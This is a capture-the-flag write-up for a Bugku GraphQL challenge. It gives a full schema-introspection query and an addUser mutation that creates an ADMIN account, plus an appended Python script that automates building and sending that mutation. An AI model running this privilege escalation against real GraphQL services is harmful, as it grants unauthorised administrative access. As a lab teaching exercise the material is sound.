Bugku practice - (HACKINI 2023) simple web app
Start by registering and logging in normally; the site reveals nothing else. Intercepting the traffic shows a request to /graphql:

{"query":"\n {\n user { \n username,\n email\n }\n }\n "}
Replaying this request as-is only returns the email and username, so we need to modify the request body.
{"query":"\n query IntrospectionQuery {\n __schema {\n \n queryType { name }\n mutationType { name }\n subscriptionType { name }\n types {\n ...FullType\n }\n directives {\n name\n description\n \n locations\n args {\n ...InputValue\n }\n }\n }\n }\n\n fragment FullType on __Type {\n kind\n name\n description\n \n fields(includeDeprecated: true) {\n name\n description\n args {\n ...InputValue\n }\n type {\n ...TypeRef\n }\n isDeprecated\n deprecationReason\n }\n inputFields {\n ...InputValue\n }\n interfaces {\n ...TypeRef\n }\n enumValues(includeDeprecated: true) {\n name\n description\n isDeprecated\n deprecationReason\n }\n possibleTypes {\n ...TypeRef\n }\n }\n\n fragment InputValue on __InputValue {\n name\n description\n type { ...TypeRef }\n defaultValue\n \n \n }\n\n fragment TypeRef on __Type {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n }\n }\n }\n }\n }\n }\n }\n }\n ","variables":{},"operationName":"IntrospectionQuery"}
This introspection query dumps the whole schema (every type, field, argument and mutation). In the User type, the role field is an enum that includes an ADMIN value, so the guess is that only a user with the ADMIN role can get the flag. Registering an account named ADMIN (or any case variant of it) does not work, so instead we use the addUser mutation to create a new user whose role is set to ADMIN.

Looking up the syntax for the addUser mutation exposed in the Mutation type, we create a new user with the ADMIN role:
{"query":"mutation {\n addUser(username:\"aaa\",password:\"bbb\",email:\"ccc\",role:ADMIN)\n}"}
Replace the original query request body with this one. Then log in as the new user and visit /profile to read the flag. (Do not use ADMIN as the username here; the server reports that the user already exists.)

About the parameters: aaa is the username, bbb is the password, ccc is the email, and role:ADMIN is the enum value (written without quotes).

After adding the user aaa with role ADMIN, log out of the current account, log in as aaa, and the flag is displayed.
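The whole procedure above (introspect the schema, find the mutation and the enum value, then build the mutation with properly escaped arguments) can be scripted. The following is an added example, not code from the write-up or the challenge; the introspection response embedded in it is a constructed, trimmed sample, and the assumption that the role enum is named Role and that addUser takes exactly the arguments username, password, email and role mirrors the write-up but is not confirmed by the page.

```python
import json
import urllib.request

# --- helpers to build a constructed sample introspection response ---------
def _scalar(name):
    return {"kind": "SCALAR", "name": name, "ofType": None}

def _non_null(inner):
    return {"kind": "NON_NULL", "name": None, "ofType": inner}

# Constructed sample (NOT the challenge's real output): a trimmed __schema
# with only the pieces the procedure relies on.
SAMPLE_INTROSPECTION = {"data": {"__schema": {
    "queryType": {"name": "Query"},
    "mutationType": {"name": "Mutation"},
    "types": [
        {"kind": "OBJECT", "name": "Query", "fields": [
            {"name": "user", "args": [],
             "type": {"kind": "OBJECT", "name": "User", "ofType": None}}]},
        {"kind": "OBJECT", "name": "Mutation", "fields": [
            {"name": "addUser", "args": [
                {"name": "username", "type": _non_null(_scalar("String"))},
                {"name": "password", "type": _non_null(_scalar("String"))},
                {"name": "email", "type": _non_null(_scalar("String"))},
                {"name": "role", "type": _non_null(
                    {"kind": "ENUM", "name": "Role", "ofType": None})},
            ], "type": _scalar("Boolean")}]},
        {"kind": "OBJECT", "name": "User", "fields": [
            {"name": "username", "args": [], "type": _scalar("String")},
            {"name": "email", "args": [], "type": _scalar("String")},
            {"name": "role", "args": [],
             "type": {"kind": "ENUM", "name": "Role", "ofType": None}}]},
        {"kind": "ENUM", "name": "Role", "enumValues": [
            {"name": "USER"}, {"name": "ADMIN"}]},
    ]}}}

def type_name(ref):
    """Unwrap NON_NULL / LIST wrappers and return the named type (String! -> String)."""
    while ref.get("name") is None and ref.get("ofType"):
        ref = ref["ofType"]
    return ref.get("name")

def list_mutations(introspection):
    """Return {mutation_name: {arg_name: arg_type}} from an introspection result."""
    schema = introspection["data"]["__schema"]
    mutation_type = (schema.get("mutationType") or {}).get("name")
    if not mutation_type:
        return {}
    for t in schema["types"]:
        if t["name"] == mutation_type:
            return {f["name"]: {a["name"]: type_name(a["type"]) for a in f["args"]}
                    for f in t["fields"]}
    return {}

def enum_values(introspection, enum_name):
    """Return the allowed values of an enum type, e.g. Role -> ['USER', 'ADMIN']."""
    for t in introspection["data"]["__schema"]["types"]:
        if t["kind"] == "ENUM" and t["name"] == enum_name:
            return [v["name"] for v in t["enumValues"]]
    return []

def build_add_user(username, password, email, role, allowed_roles):
    """Build the addUser request body. String args are quoted/escaped via json.dumps
    (GraphQL string literal syntax matches JSON); the enum is emitted bare."""
    if role not in allowed_roles:
        raise ValueError("role %r not in enum values %r" % (role, allowed_roles))
    query = "mutation { addUser(username:%s, password:%s, email:%s, role:%s) }" % (
        json.dumps(username), json.dumps(password), json.dumps(email), role)
    return {"query": query}

def post_graphql(url, body, cookie=None):
    """Send a GraphQL body to the endpoint (network; not called at import time).
    Assumed: the endpoint accepts JSON POST and identifies the session by cookie."""
    req = urllib.request.Request(url, data=json.dumps(body).encode(),
                                 headers={"Content-Type": "application/json"})
    if cookie:
        req.add_header("Cookie", cookie)
    with urllib.request.urlopen(req) as resp:
        return json.loads(resp.read())

if __name__ == "__main__":
    muts = list_mutations(SAMPLE_INTROSPECTION)
    roles = enum_values(SAMPLE_INTROSPECTION, "Role")
    print("mutations:", muts)
    print("roles:", roles)
    print(build_add_user("aaa", "bbb", "ccc", "ADMIN", roles)["query"])
```

Against a live target you would first run the page's IntrospectionQuery through post_graphql, feed the response to list_mutations and enum_values, and only then build and send the addUser body; validating role against the enum catches typos such as role:"ADMIN" (a quoted string is a type error for an enum argument) before the server does.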
